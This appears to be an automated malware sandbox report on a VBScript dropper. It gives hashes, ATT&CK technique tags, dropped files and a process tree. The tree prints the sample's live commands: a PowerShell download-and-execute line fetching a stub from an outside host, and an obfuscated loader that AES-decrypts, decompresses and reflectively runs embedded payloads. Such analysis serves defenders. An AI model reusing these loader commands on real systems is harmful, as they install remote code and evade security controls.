5e34ea7fbf3080fe5b5ad6fb5a1a3f9b11e783dc8cda28985e048970256831c3

General

Target

9765_output.vbs
Size

69KB
MD5

f0a90fbc29a64f4274b014755f88c990
SHA1

e8f7053bea6eab342edf9d80c15835b6fb6d9844
SHA256

df37f986e4342d26e408aa370058ba21d218aaac358ba940bde7ac1f035549d7
SHA512

fc42c09434d77f5688d23eab7700440196d07e517e3940d3b47484f2c4de214301063b9537febf1f3396fcf033cead22b4aecd68f18acc7c6f06f8f06ffc3c77
SSDEEP

768:Oyq+h3xb1DhEhMXSHLGjhlZrkoq22Ub9aLILRNho4rBT9qDCJfJw/urPFpjw4g:lhBJihvKjhbQoDNbUILRUcE4wWrtp0D

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1088	powershell.exe
3008	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
3008	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1088	powershell.exe
3008	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2416 wrote to memory of 2420	2416	WScript.exe	30
PID 2416 wrote to memory of 2420	2416	WScript.exe	30
PID 2416 wrote to memory of 2420	2416	WScript.exe	30
PID 2420 wrote to memory of 1088	2420	cmd.exe	32
PID 2420 wrote to memory of 1088	2420	cmd.exe	32
PID 2420 wrote to memory of 1088	2420	cmd.exe	32
PID 2416 wrote to memory of 2896	2416	WScript.exe	34
PID 2416 wrote to memory of 2896	2416	WScript.exe	34
PID 2416 wrote to memory of 2896	2416	WScript.exe	34
PID 2896 wrote to memory of 3008	2896	cmd.exe	36
PID 2896 wrote to memory of 3008	2896	cmd.exe	36
PID 2896 wrote to memory of 3008	2896	cmd.exe	36
PID 2896 wrote to memory of 3008	2896	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9765_output.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8l4w457KDIom6rIqFxIss0f2qXmFneRo91Mq9t/nGJg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QryA4ACPDNVab4+J6hK+gg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zmSQy=New-Object System.IO.MemoryStream(,$param_var); $CTpIN=New-Object System.IO.MemoryStream; $uhoSQ=New-Object System.IO.Compression.GZipStream($zmSQy, [IO.Compression.CompressionMode]::Decompress); $uhoSQ.CopyTo($CTpIN); $uhoSQ.Dispose(); $zmSQy.Dispose(); $CTpIN.Dispose(); $CTpIN.ToArray();}function execute_function($param_var,$param2_var){ $UlPQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xvztn=$UlPQj.EntryPoint; $xvztn.Invoke($null, $param2_var);}$xRCke = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $xRCke;$gqghP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($xRCke).Split([Environment]::NewLine);foreach ($TgnJP in $gqghP) { if ($TgnJP.StartsWith(':: ')) { $uPmQq=$TgnJP.Substring(20); break; }}$payloads_var=[string[]]$uPmQq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
59KB

MD5
2fe4e3e118697eead89b94cebee0ed28

SHA1
db39a109814414635ab1a4927a7b6e36b4d1c6c7

SHA256
49e4034c34b5666f17def98af21b627c4bc9c1e9e8a7022b4d37135d3807d8bd

SHA512
ca116d36ff813b12323a25825282ee113295cf71b77e323999b7c6058490924f417e08f27e22549f4b4a996cd6ef84e34ab16c678a86767e76b2f3eb6dad585f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H5YEI2K40MMPXZWH59X7.temp

Filesize
7KB

MD5
2b88758a21aed7d299cda6ae781f22d3

SHA1
41dbc9226cded7ec2971b3ddaf86ef8031baa09a

SHA256
df5b4b9649ccc80b3357248c5b20c3697919494db2080ef6285a4d73ca055f37

SHA512
6aa4889ccc2547702499021c0564e938dd1917a26dd15903cda3b7e429fba49899c70319d93c1d4ea99c080ccb763fc033305387e9b677b400a5ceb1acc5f407

Download Submit
memory/1088-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp

Filesize
4KB

Download
memory/1088-5-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/1088-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1088-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1088-7-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/1088-6-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1088-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1088-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing